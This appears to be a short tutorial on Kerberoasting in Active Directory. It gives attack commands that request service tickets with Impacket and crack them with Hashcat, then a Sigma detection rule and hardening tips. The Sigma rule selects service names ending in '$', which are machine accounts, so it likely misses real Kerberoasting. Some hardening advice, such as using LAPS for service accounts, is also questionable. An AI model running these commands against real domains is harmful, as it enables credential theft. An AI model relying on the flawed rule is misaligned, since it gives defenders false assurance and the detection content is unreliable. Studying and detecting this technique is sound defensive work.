Kerberoasting From Both Sides: Attack Execution and Detection With Elastic SIEM

## What is Kerberoasting? Kerberoasting is a post-exploitation technique targeting Kerberos service account tickets. Any domain user can request a Ticket Granting Service (TGS) ticket for any SPN — and that ticket is encrypted with the service account's NTLM hash. Offline cracking does the rest. ## The Attack ```bash # 1. Enumerate SPNs with Impacket python3 GetUserSPNs.py CORP.LOCAL/jdoe:Password1 -request # 2. Crack with Hashcat hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt --force ``` ## Detection with Sigma ```yaml title: Kerberoasting TGS Request status: stable logsource: product: windows service: security detection: selection: EventID: 4769 TicketEncryptionType: 0x17 # RC4 — legacy, unusual in modern AD ServiceName|endswith: '$' Status: 0x0 condition: selection falsepositives: - Legacy applications using RC4 level: high ``` ## Hardening - Set `msDS-SupportedEncryptionTypes = 24` (AES128+AES256) on service accounts. - Enforce long, random passwords (25+ chars) for service accounts via LAPS or a PAM solution. - Monitor 4769 events for unusual service accounts or non-admin source IPs.